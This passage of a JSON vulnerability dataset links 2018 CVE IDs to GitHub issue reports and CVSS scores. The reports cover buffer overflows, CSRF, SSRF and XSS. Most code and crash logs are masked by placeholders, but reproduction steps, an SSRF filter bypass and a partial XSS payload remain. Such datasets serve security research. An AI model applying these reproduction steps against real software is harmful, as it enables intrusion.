  22901. "description": "one null pointer deference bug in in APITAG in APITAG To reproduce: ./mp4dump format json $poc poc: FILETAG APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG e2b1f bp NUMBERTAG fff NUMBERTAG fa2cb0 sp NUMBERTAG fff NUMBERTAG fa2aa0 T NUMBERTAG e2b1e in APITAG const , unsigned char const , unsigned int, APITAG PATHTAG NUMBERTAG bc7 in APITAG PATHTAG NUMBERTAG d8b NUMBERTAG in APITAG PATHTAG NUMBERTAG ec in APITAG ) const PATHTAG NUMBERTAG f8b6 in APITAG const&) const PATHTAG NUMBERTAG f8b6 in APITAG PATHTAG NUMBERTAG d8b NUMBERTAG in APITAG PATHTAG NUMBERTAG f9e in main PATHTAG NUMBERTAG fc5c6b NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG e NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG in APITAG const , unsigned char const , unsigned int, APITAG NUMBERTAG ABORTING",
  22902. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  22903. "severity": "MEDIUM",
  22904. "baseScore": 5.5,
  22905. "impactScore": 3.6,
  22906. "exploitabilityScore": 1.8
  22907. },
  22908. {
  22909. "CVE_ID": "CVE-2018-14544",
  22910. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/291",
  22911. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/291",
  22912. "Repo_new": "axiomatic-systems/bento4",
  22913. "Issue_Created_At": "2018-07-20T03:13:14Z",
  22914. "description": "two null pointer deference in APITAG in when running mp NUMBERTAG ts . POC to trigger the two bugs. FILETAG NUMBERTAG mp NUMBERTAG ts poc1 FILETAG APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG e NUMBERTAG bp NUMBERTAG ffc NUMBERTAG da NUMBERTAG sp NUMBERTAG ffc NUMBERTAG da5e0 T NUMBERTAG e5f in APITAG const PATHTAG NUMBERTAG e5f in APITAG APITAG APITAG , bool, APITAG PATHTAG NUMBERTAG in APITAG APITAG , APITAG , APITAG , APITAG , APITAG , APITAG , unsigned int) PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG fa NUMBERTAG bec NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG f8 in _start ( PATHTAG NUMBERTAG mp NUMBERTAG ts poc2 FILETAG APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG c (pc NUMBERTAG e NUMBERTAG bp NUMBERTAG ffed NUMBERTAG fc NUMBERTAG sp NUMBERTAG ffed NUMBERTAG fb NUMBERTAG T NUMBERTAG e NUMBERTAG in APITAG const PATHTAG NUMBERTAG e NUMBERTAG in APITAG APITAG APITAG , bool, APITAG PATHTAG NUMBERTAG b1e in APITAG APITAG , APITAG , APITAG , APITAG , APITAG , APITAG , unsigned int) PATHTAG NUMBERTAG b1e in main PATHTAG NUMBERTAG f3ffb NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG f8 in _start ( PATHTAG )",
  22915. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  22916. "severity": "MEDIUM",
  22917. "baseScore": 5.5,
  22918. "impactScore": 3.6,
  22919. "exploitabilityScore": 1.8
  22920. },
  22921. {
  22922. "CVE_ID": "CVE-2018-14549",
  22923. "Issue_Url_old": "https://github.com/marc-q/libwav/issues/23",
  22924. "Issue_Url_new": "https://github.com/marc-q/libwav/issues/23",
  22925. "Repo_new": "marc-q/libwav",
  22926. "Issue_Created_At": "2018-07-21T04:54:03Z",
  22927. "description": "SEGV in function wav_write in libwav.c. I use Clang NUMBERTAG and APITAG to build libwav , this file URLTAG can cause SEGV signal in function APITAG in APITAG when running the APITAG in folder APITAG with the following command: APITAG This is the ASAN information: ERRORTAG",
  22928. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  22929. "severity": "MEDIUM",
  22930. "baseScore": 6.5,
  22931. "impactScore": 3.6,
  22932. "exploitabilityScore": 2.8
  22933. },
  22934. {
  22935. "CVE_ID": "CVE-2018-14550",
  22936. "Issue_Url_old": "https://github.com/glennrp/libpng/issues/246",
  22937. "Issue_Url_new": "https://github.com/glennrp/libpng/issues/246",
  22938. "Repo_new": "glennrp/libpng",
  22939. "Issue_Created_At": "2018-07-21T07:08:11Z",
  22940. "description": "stack buffer overflow in png2pnm in function get_token. There is an issue in png2pnm in libpng NUMBERTAG It's a stack buffer overflow in png2pnm in function get_token. To compile png2pnm,those command can be used with Clang NUMBERTAG CODETAG The APITAG in folder APITAG should also be modified before the command APITAG as mention in this comment URLTAG : CODETAG This file URLTAG can cause stack buffer overflow when using this command: APITAG This is the ASAN information: ERRORTAG",
  22941. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  22942. "severity": "HIGH",
  22943. "baseScore": 8.8,
  22944. "impactScore": 5.9,
  22945. "exploitabilityScore": 2.8
  22946. },
  22947. {
  22948. "CVE_ID": "CVE-2018-14551",
  22949. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1221",
  22950. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1221",
  22951. "Repo_new": "imagemagick/imagemagick",
  22952. "Issue_Created_At": "2018-07-20T09:26:25Z",
  22953. "description": "Using uninitialized variable in PATHTAG Prerequisites Y] I have written a descriptive issue title [Y] I have verified that I am using the latest version of APITAG [Y] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description The code in PATHTAG use uninitialized variable. line NUMBERTAG APITAG line NUMBERTAG run into APITAG there have some break condition in the loop. APITAG APITAG line NUMBERTAG APITAG The code use uninitialized variable if break from loop.",
  22954. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  22955. "severity": "CRITICAL",
  22956. "baseScore": 9.8,
  22957. "impactScore": 5.9,
  22958. "exploitabilityScore": 3.9
  22959. },
  22960. {
  22961. "CVE_ID": "CVE-2018-14562",
  22962. "Issue_Url_old": "https://github.com/thunlp/THULAC/issues/35",
  22963. "Issue_Url_new": "https://github.com/thunlp/thulac/issues/35",
  22964. "Repo_new": "thunlp/thulac",
  22965. "Issue_Created_At": "2018-07-18T02:02:47Z",
  22966. "description": "SEGV signal occurred when running program thulac. When I try to run thulac and thulac_test program. I found this : ERRORTAG",
  22967. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  22968. "severity": "CRITICAL",
  22969. "baseScore": 9.8,
  22970. "impactScore": 5.9,
  22971. "exploitabilityScore": 3.9
  22972. },
  22973. {
  22974. "CVE_ID": "CVE-2018-14563",
  22975. "Issue_Url_old": "https://github.com/thunlp/THULAC/issues/37",
  22976. "Issue_Url_new": "https://github.com/thunlp/thulac/issues/37",
  22977. "Repo_new": "thunlp/thulac",
  22978. "Issue_Created_At": "2018-07-18T02:34:19Z",
  22979. "description": "Alloc dealloc mismatch . When I give an empty file to the program train_c, I found this issue: ERRORTAG",
  22980. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  22981. "severity": "CRITICAL",
  22982. "baseScore": 9.8,
  22983. "impactScore": 5.9,
  22984. "exploitabilityScore": 3.9
  22985. },
  22986. {
  22987. "CVE_ID": "CVE-2018-14565",
  22988. "Issue_Url_old": "https://github.com/thunlp/THULAC/issues/36",
  22989. "Issue_Url_new": "https://github.com/thunlp/thulac/issues/36",
  22990. "Repo_new": "thunlp/thulac",
  22991. "Issue_Created_At": "2018-07-18T02:06:29Z",
  22992. "description": "Buffer overflow occurred during training process. When I try to run program train_c with the command line : APITAG The address sanitizer found a heap buffer overflow issue: ERRORTAG The input file I tried to give to the program train_c contains only APITAG as you suggested in your document.",
  22993. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  22994. "severity": "CRITICAL",
  22995. "baseScore": 9.8,
  22996. "impactScore": 5.9,
  22997. "exploitabilityScore": 3.9
  22998. },
  22999. {
  23000. "CVE_ID": "CVE-2018-14572",
  23001. "Issue_Url_old": "https://github.com/PyconUK/ConferenceScheduler-cli/issues/19",
  23002. "Issue_Url_new": "https://github.com/pyconuk/conferencescheduler-cli/issues/19",
  23003. "Repo_new": "pyconuk/conferencescheduler-cli",
  23004. "Issue_Created_At": "2018-07-24T00:52:43Z",
  23005. "description": "import_schedule_definition is vulnerable. CODETAG Hi, there is a vulnerability in import_schedule_definition method in io.py, please see APITAG above. It can execute arbitrary python commands resulting in command execution.",
  23006. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23007. "severity": "HIGH",
  23008. "baseScore": 7.8,
  23009. "impactScore": 5.9,
  23010. "exploitabilityScore": 1.8
  23011. },
  23012. {
  23013. "CVE_ID": "CVE-2018-14576",
  23014. "Issue_Url_old": "https://github.com/SunContract/SmartContracts/issues/1",
  23015. "Issue_Url_new": "https://github.com/suncontract/smartcontracts/issues/1",
  23016. "Repo_new": "suncontract/smartcontracts",
  23017. "Issue_Created_At": "2018-07-17T13:43:54Z",
  23018. "description": "Integer overflow in APITAG Hello, I have found an integer overflow in APITAG supply variable could overflow,because of the _amount variable is controlled by us and can eventually cause supply overflow to zero. ERRORTAG",
  23019. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  23020. "severity": "HIGH",
  23021. "baseScore": 7.5,
  23022. "impactScore": 3.6,
  23023. "exploitabilityScore": 3.9
  23024. },
  23025. {
  23026. "CVE_ID": "CVE-2018-14582",
  23027. "Issue_Url_old": "https://github.com/bagesoft/bagecms/issues/2",
  23028. "Issue_Url_new": "https://github.com/bagesoft/bagecms/issues/2",
  23029. "Repo_new": "bagesoft/bagecms",
  23030. "Issue_Created_At": "2018-07-23T02:17:32Z",
  23031. "description": "There is a CSRF vulnerability that can be used to add a background administrator.. When the administrator lands, open it. APITAG APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  23032. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23033. "severity": "HIGH",
  23034. "baseScore": 8.8,
  23035. "impactScore": 5.9,
  23036. "exploitabilityScore": 2.8
  23037. },
  23038. {
  23039. "CVE_ID": "CVE-2018-14583",
  23040. "Issue_Url_old": "https://github.com/maoGod/xyhcms/issues/1",
  23041. "Issue_Url_new": "https://github.com/maogod/xyhcms/issues/1",
  23042. "Repo_new": "maoGod/xyhcms",
  23043. "Issue_Created_At": "2018-07-23T03:33:24Z",
  23044. "description": "Xyhcms NUMBERTAG There is a CSRF vulnerability to add a background administrator. When the administrator lands, open it. APITAG CODETAG",
  23045. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23046. "severity": "HIGH",
  23047. "baseScore": 8.8,
  23048. "impactScore": 5.9,
  23049. "exploitabilityScore": 2.8
  23050. },
  23051. {
  23052. "CVE_ID": "CVE-2018-14584",
  23053. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/304",
  23054. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/304",
  23055. "Repo_new": "axiomatic-systems/bento4",
  23056. "Issue_Created_At": "2018-07-23T07:32:04Z",
  23057. "description": "A heap buffer overflow has occurred when running program mp4info.. A heap buffer overflow has occurred when running program mp4info. ERRORTAG The testing program is mp4info. And the input file has been put at: FILETAG",
  23058. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23059. "severity": "HIGH",
  23060. "baseScore": 8.8,
  23061. "impactScore": 5.9,
  23062. "exploitabilityScore": 2.8
  23063. },
  23064. {
  23065. "CVE_ID": "CVE-2018-14587",
  23066. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/301",
  23067. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/301",
  23068. "Repo_new": "axiomatic-systems/bento4",
  23069. "Issue_Created_At": "2018-07-23T06:39:42Z",
  23070. "description": "A global buffer overflow has occurred when running mp4info. A global buffer overflow has occurred when running ./mp4info ERRORTAG The testing program is mp4info. And the input file has been put at: FILETAG",
  23071. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23072. "severity": "HIGH",
  23073. "baseScore": 8.8,
  23074. "impactScore": 5.9,
  23075. "exploitabilityScore": 2.8
  23076. },
  23077. {
  23078. "CVE_ID": "CVE-2018-14588",
  23079. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/302",
  23080. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/302",
  23081. "Repo_new": "axiomatic-systems/bento4",
  23082. "Issue_Created_At": "2018-07-23T06:45:02Z",
  23083. "description": "A SEGV signal occurred when running mp4info. A SEGV signal occurred when running mp4info. ERRORTAG The testing program is mp4info And the input file has been put at: URLTAG",
  23084. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  23085. "severity": "HIGH",
  23086. "baseScore": 7.5,
  23087. "impactScore": 3.6,
  23088. "exploitabilityScore": 3.9
  23089. },
  23090. {
  23091. "CVE_ID": "CVE-2018-14589",
  23092. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/303",
  23093. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/303",
  23094. "Repo_new": "axiomatic-systems/bento4",
  23095. "Issue_Created_At": "2018-07-23T07:02:34Z",
  23096. "description": "A heap buffer overflow has occurred when running program mp4info. . A heap buffer overflow has occurred when running program mp4info. ERRORTAG he testing program is mp4info. And the input file has been put at: FILETAG",
  23097. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23098. "severity": "HIGH",
  23099. "baseScore": 8.8,
  23100. "impactScore": 5.9,
  23101. "exploitabilityScore": 2.8
  23102. },
  23103. {
  23104. "CVE_ID": "CVE-2018-14590",
  23105. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/305",
  23106. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/305",
  23107. "Repo_new": "axiomatic-systems/bento4",
  23108. "Issue_Created_At": "2018-07-23T07:35:12Z",
  23109. "description": "A SEGV signal occurred when running mp4compact.. A SEGV signal occurred when running mp4compact. ERRORTAG The testing program is mp4compact. And the input file has been put at: URLTAG",
  23110. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  23111. "severity": "HIGH",
  23112. "baseScore": 7.5,
  23113. "impactScore": 3.6,
  23114. "exploitabilityScore": 3.9
  23115. },
  23116. {
  23117. "CVE_ID": "CVE-2018-14649",
  23118. "Issue_Url_old": "https://github.com/ceph/ceph-iscsi-cli/issues/120",
  23119. "Issue_Url_new": "https://github.com/ceph/ceph-iscsi-cli/issues/120",
  23120. "Repo_new": "ceph/ceph-iscsi-cli",
  23121. "Issue_Created_At": "2018-09-23T15:19:00Z",
  23122. "description": "rbd target api.py exploited.. Hello, I've found that the python code was used to compromise our host remotely (in our case it was running as root so the attacker gained root privileges), the logs contains: CODETAG Hope this helps.",
  23123. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  23124. "severity": "CRITICAL",
  23125. "baseScore": 9.8,
  23126. "impactScore": 5.9,
  23127. "exploitabilityScore": 3.9
  23128. },
  23129. {
  23130. "CVE_ID": "CVE-2018-14718",
  23131. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2097",
  23132. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2097",
  23133. "Repo_new": "fasterxml/jackson-databind",
  23134. "Issue_Created_At": "2018-07-27T05:58:22Z",
  23135. "description": "CVE xxxx xxx: block another type from polymorphic deserialization. (note: placeholder for a CVE)",
  23136. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  23137. "severity": "CRITICAL",
  23138. "baseScore": 9.8,
  23139. "impactScore": 5.9,
  23140. "exploitabilityScore": 3.9
  23141. },
  23142. {
  23143. "CVE_ID": "CVE-2018-14730",
  23144. "Issue_Url_old": "https://github.com/AgentME/browserify-hmr/issues/41",
  23145. "Issue_Url_new": "https://github.com/macil/browserify-hmr/issues/41",
  23146. "Repo_new": "macil/browserify-hmr",
  23147. "Issue_Created_At": "2018-07-24T08:12:44Z",
  23148. "description": "A vulnerability found in browserify hmr. Hi, I found a vulnerability in browserify hmr, how do I report it to you?",
  23149. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  23150. "severity": "HIGH",
  23151. "baseScore": 7.5,
  23152. "impactScore": 3.6,
  23153. "exploitabilityScore": 3.9
  23154. },
  23155. {
  23156. "CVE_ID": "CVE-2018-14731",
  23157. "Issue_Url_old": "https://github.com/parcel-bundler/parcel/issues/1783",
  23158. "Issue_Url_new": "https://github.com/parcel-bundler/parcel/issues/1783",
  23159. "Repo_new": "parcel-bundler/parcel",
  23160. "Issue_Created_At": "2018-07-24T08:11:12Z",
  23161. "description": "A vulnerability found in parcel bundler. Hi, I found a vulnerability in parcel bundler, how do I report it to you?",
  23162. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  23163. "severity": "HIGH",
  23164. "baseScore": 7.5,
  23165. "impactScore": 3.6,
  23166. "exploitabilityScore": 3.9
  23167. },
  23168. {
  23169. "CVE_ID": "CVE-2018-14732",
  23170. "Issue_Url_old": "https://github.com/webpack/webpack-dev-server/issues/1445",
  23171. "Issue_Url_new": "https://github.com/webpack/webpack-dev-server/issues/1445",
  23172. "Repo_new": "webpack/webpack-dev-server",
  23173. "Issue_Created_At": "2018-07-24T08:09:59Z",
  23174. "description": "A vulnerability found in webpack dev server. Hi, I found a vulnerability in webpack dev server, how do I report it to you?",
  23175. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  23176. "severity": "HIGH",
  23177. "baseScore": 7.5,
  23178. "impactScore": 3.6,
  23179. "exploitabilityScore": 3.9
  23180. },
  23181. {
  23182. "CVE_ID": "CVE-2018-14732",
  23183. "Issue_Url_old": "https://github.com/webpack/webpack-dev-server/issues/1620",
  23184. "Issue_Url_new": "https://github.com/webpack/webpack-dev-server/issues/1620",
  23185. "Repo_new": "webpack/webpack-dev-server",
  23186. "Issue_Created_At": "2019-01-07T17:51:38Z",
  23187. "description": "Please backport CVETAG security fix to NUMBERTAG Operating System: n/a Node Version: n/a NPM Version: n/a webpack Version NUMBERTAG webpack dev server Version NUMBERTAG This is a bug [x] This is a modification request [ CVETAG ] describes a vulnerability in webpack dev APITAG by which attackers are able to steal developers\u2019 code. The vulnerability is classified as \u201cHIGH severity\u201d under the CVSS NUMBERTAG score. [A patch has been released][patch] and included in version NUMBERTAG However, version NUMBERTAG of the package requires APITAG , which entails significant breaking changes from Webpack NUMBERTAG and prior versions, as well as major version bumps to transitive peer dependencies, including APITAG . It is not trivial for users of the NUMBERTAG series to upgrade to a patched version of webpack dev server. As such, please backport the fix to version NUMBERTAG and release a new version, to protect the security of users who are unable to upgrade. Thank you for the hard work that you put into developing and maintaining this library. We appreciate it. [ CVETAG ]: URLTAG [patch]: URLTAG [comment]: URLTAG",
  23188. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  23189. "severity": "HIGH",
  23190. "baseScore": 7.5,
  23191. "impactScore": 3.6,
  23192. "exploitabilityScore": 3.9
  23193. },
  23194. {
  23195. "CVE_ID": "CVE-2018-14733",
  23196. "Issue_Url_old": "https://github.com/OCA/server-tools/issues/1335",
  23197. "Issue_Url_new": "https://github.com/oca/server-tools/issues/1335",
  23198. "Repo_new": "oca/server-tools",
  23199. "Issue_Created_At": "2018-08-08T07:56:44Z",
  23200. "description": "SEC] OCA NUMBERTAG Denial of Service via APITAG . Security Advisory (OCA NUMBERTAG Denial of Service via APITAG Affects: Odoo NUMBERTAG servers: having APITAG module available in the addons path being directly accessible OR missing the expected configuration at the reverse proxy level (nginx) Credits : Nils Hamerlinck APITAG CVE ID : [ CVETAG CVETAG I. Background APITAG URLTAG module from OCA's APITAG repository URLTAG allows to take into account a specific HTTP header in the request ( APITAG or APITAG , depending on the version) to define the FILETAG applying to the instance. This is useful when you have one instance with multiple databases whose names don't match with the target domain names. II. Problem Description In a normal use case this HTTP header is set by the system administrator at the reverse proxy level (nginx); module is added to the APITAG config parameter and installed. But the module contains a APITAG directory, which had the unexpected effect URLTAG of trigerring its inconditional loading, even when not intended to be used: not added to the APITAG nor installed. III. Impact Attack Vector : Network exploitable Authentication : Not Required CVSS3 Score : High NUMBERTAG PATHTAG URLTAG So by just having it available in its addons path, the instance would load APITAG . An attacker could define a APITAG / APITAG header that would be evaluated as the db_filter regular expression URLTAG . By crafting a voluntarily inefficient regular expression, he could lead Odoo to APITAG (aka APITAG in threaded mode, with one request; in multi workers mode, with one request per worker (that would process until APITAG ). IV. Workaround If your Odoo server is accessible directly without any reverse proxy, there is no workaround. Note that using a reverse proxy is FILETAG for security but also performances reasons. If your Odoo server is running behind a reverse proxy, configure it at least to set the APITAG header to APITAG (or any relevant stricter regex for the concerned host): nginx: APITAG others: see here URLTAG V. Solution Update APITAG source code. If you intend to use this module in a deployment, make sure that: proxy mode is enabled in Odoo's configuration file: APITAG a APITAG header is properly defined at reverse proxy level module is added to APITAG VI. Correction details The following list contains the revisions after which the vulnerability is corrected NUMBERTAG URLTAG NUMBERTAG fa NUMBERTAG URLTAG NUMBERTAG e9bf URLTAG NUMBERTAG f5 URLTAG",
  23201. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  23202. "severity": "HIGH",
  23203. "baseScore": 7.5,
  23204. "impactScore": 3.6,
  23205. "exploitabilityScore": 3.9
  23206. },
  23207. {
  23208. "CVE_ID": "CVE-2018-14736",
  23209. "Issue_Url_old": "https://github.com/cloudwu/pbc/issues/123",
  23210. "Issue_Url_new": "https://github.com/cloudwu/pbc/issues/123",
  23211. "Repo_new": "cloudwu/pbc",
  23212. "Issue_Created_At": "2018-07-24T06:48:42Z",
  23213. "description": "A global buffer overflow issue has been detected. When I ran the program addressbook. ASAN found a global buffer overflow: ERRORTAG",
  23214. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  23215. "severity": "HIGH",
  23216. "baseScore": 7.5,
  23217. "impactScore": 3.6,
  23218. "exploitabilityScore": 3.9
  23219. },
  23220. {
  23221. "CVE_ID": "CVE-2018-14737",
  23222. "Issue_Url_old": "https://github.com/cloudwu/pbc/issues/122",
  23223. "Issue_Url_new": "https://github.com/cloudwu/pbc/issues/122",
  23224. "Repo_new": "cloudwu/pbc",
  23225. "Issue_Created_At": "2018-07-24T06:42:29Z",
  23226. "description": "SEGV signal found when running program pbc. A SEGV signal occurred when running program pbc: ERRORTAG",
  23227. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  23228. "severity": "HIGH",
  23229. "baseScore": 7.5,
  23230. "impactScore": 3.6,
  23231. "exploitabilityScore": 3.9
  23232. },
  23233. {
  23234. "CVE_ID": "CVE-2018-14744",
  23235. "Issue_Url_old": "https://github.com/cloudwu/pbc/issues/125",
  23236. "Issue_Url_new": "https://github.com/cloudwu/pbc/issues/125",
  23237. "Repo_new": "cloudwu/pbc",
  23238. "Issue_Created_At": "2018-07-24T10:39:34Z",
  23239. "description": "Heap use after free detected. When I ran the program pattern. A issue occurred, it's a heap use after free issue. Details: ERRORTAG The command line I used is just: ./pattern testcase. The testcase of this issue has been put at: URLTAG",
  23240. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  23241. "severity": "CRITICAL",
  23242. "baseScore": 9.8,
  23243. "impactScore": 5.9,
  23244. "exploitabilityScore": 3.9
  23245. },
  23246. {
  23247. "CVE_ID": "CVE-2018-14835",
  23248. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/760",
  23249. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/760",
  23250. "Repo_new": "intelliants/subrion",
  23251. "Issue_Created_At": "2018-07-14T04:40:46Z",
  23252. "description": "Stored self XSS in APITAG member field tooltip\". There exists no escape when printing out tooltip under APITAG member\" ( URLTAG Steps to reproduce Navigate to Member field URLTAG Add a new field group or edit an existing one. Add the tooltip value as our XSS payload ERRORTAG Now navigate to URLTAG XSS payload would be trigerred. APITAG APITAG",
  23253. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  23254. "severity": "MEDIUM",
  23255. "baseScore": 5.4,
  23256. "impactScore": 2.7,
  23257. "exploitabilityScore": 2.3
  23258. },
  23259. {
  23260. "CVE_ID": "CVE-2018-14836",
  23261. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/762",
  23262. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/762",
  23263. "Repo_new": "intelliants/subrion",
  23264. "Issue_Created_At": "2018-07-14T18:10:11Z",
  23265. "description": "Broken Authentication APITAG partial access to admin panel) . In the application, the administrator can create user groups & also apply security policies (permission) to it, application to all member of its group. One of the policies being user group permission to the \"admin panel\". Unfortunately, this doesn't work as expected. A normal user belonging to the Registered group ( No access to admin panel ), can still get inside the admin panel (but cant perform any action). Steps to reproduce NUMBERTAG Navigate to admin panel & enter credentials (registered user), user would be logged in NUMBERTAG Once he clicks on any links, would be quickly logged out of the application & would not be able to log in again. In order to reproduce again, log in from a valid user credential, having access to the admin panel & then logout. Now repeat NUMBERTAG",
  23266. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  23267. "severity": "MEDIUM",
  23268. "baseScore": 6.5,
  23269. "impactScore": 3.6,
  23270. "exploitabilityScore": 2.8
  23271. },
  23272. {
  23273. "CVE_ID": "CVE-2018-14840",
  23274. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/773",
  23275. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/773",
  23276. "Repo_new": "intelliants/subrion",
  23277. "Issue_Created_At": "2018-08-01T07:56:36Z",
  23278. "description": "Deny access for .html files in uploads folder.",
  23279. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  23280. "severity": "MEDIUM",
  23281. "baseScore": 6.1,
  23282. "impactScore": 2.7,
  23283. "exploitabilityScore": 2.8
  23284. },
  23285. {
  23286. "CVE_ID": "CVE-2018-14858",
  23287. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/33",
  23288. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/33",
  23289. "Repo_new": "idreamsoft/iCMS",
  23290. "Issue_Created_At": "2018-08-02T04:33:24Z",
  23291. "description": "iCMS NUMBERTAG SSRF vulnerability. >A SSRF vulnerability was discovered in iCMS NUMBERTAG here is a SSRF vulnerability that allows attackers to remotely construct malicious data to read server sensitive information. via the APITAG Notice This vulnerability is used in the right way APITAG of loophole repair is bypassed, or the flaw caused by imperfect repair. cause of loopholes The vulnerability is repaired by the URL protocol judgment before each HTTP request. Only HTTP, the URL of the HTTPS protocol is successfully requested, but the IP format URL is not limited, so the URLTAG or the IP decimal format of URL URLTAG NUMBERTAG can be used to obtain the service. Information of Intranet resources APITAG POC APITAG APITAG",
  23292. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  23293. "severity": "HIGH",
  23294. "baseScore": 7.5,
  23295. "impactScore": 3.6,
  23296. "exploitabilityScore": 3.9
  23297. },
  23298. {
  23299. "CVE_ID": "CVE-2018-14876",
  23300. "Issue_Url_old": "https://github.com/FLIF-hub/FLIF/issues/520",
  23301. "Issue_Url_new": "https://github.com/flif-hub/flif/issues/520",
  23302. "Repo_new": "flif-hub/flif",
  23303. "Issue_Created_At": "2018-07-25T07:00:06Z",
  23304. "description": "FLIF aborted caused by longjmp causes uninitialized stack frame. Hello,guys,I use my company fuzzing tools .I found FLIF aborted.I think it caused by longjmp causes uninitialized stack frame.I search some information abort it. In google,the curl meet same situation.So I think it is a BUG. So,I want to show you more information about it.",
  23305. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  23306. "severity": "MEDIUM",
  23307. "baseScore": 5.5,
  23308. "impactScore": 3.6,
  23309. "exploitabilityScore": 1.8
  23310. },
  23311. {
  23312. "CVE_ID": "CVE-2018-14877",
  23313. "Issue_Url_old": "https://github.com/alterebro/WeaselCMS/issues/5",
  23314. "Issue_Url_new": "https://github.com/alterebro/weaselcms/issues/5",
  23315. "Repo_new": "alterebro/weaselcms",
  23316. "Issue_Created_At": "2018-07-31T02:13:05Z",
  23317. "description": "There have XSS vulnerability that can excute javascript . There are NUMBERTAG SS vulnerabilities loading FILETAG log in and select \"SETTINGS\", Insert the payload APITAG APITAG >alert NUMBERTAG APITAG //\" in the Site APITAG APITAG APITAG Keywords and submit. open FILETAG line NUMBERTAG CODETAG",
